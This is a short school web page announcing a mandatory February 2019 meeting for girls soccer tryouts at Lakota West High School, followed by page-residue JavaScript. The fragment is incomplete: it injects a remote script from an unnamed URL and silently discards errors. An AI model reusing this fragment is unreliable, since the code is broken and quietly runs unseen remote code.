Girls Soccer

Mark You Calendars: Girls Soccer Player/Parent Meeting!

Interested in trying out for the 2019 Lakota West women’s soccer program? There will be a mandatory Parent/Player meeting on Monday, February 11, 2019 for current 8th-11th grade girls.  The meeting will be held in the Community Room at Lakota West High School at 6:30 PM.  ALL players interested in trying out are required to attend with a parent.  You will receive information about summer events and workouts. Please contact Coach Reder at brigitreder@gmail.com for all other questions. #WestPride

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

Popular Posts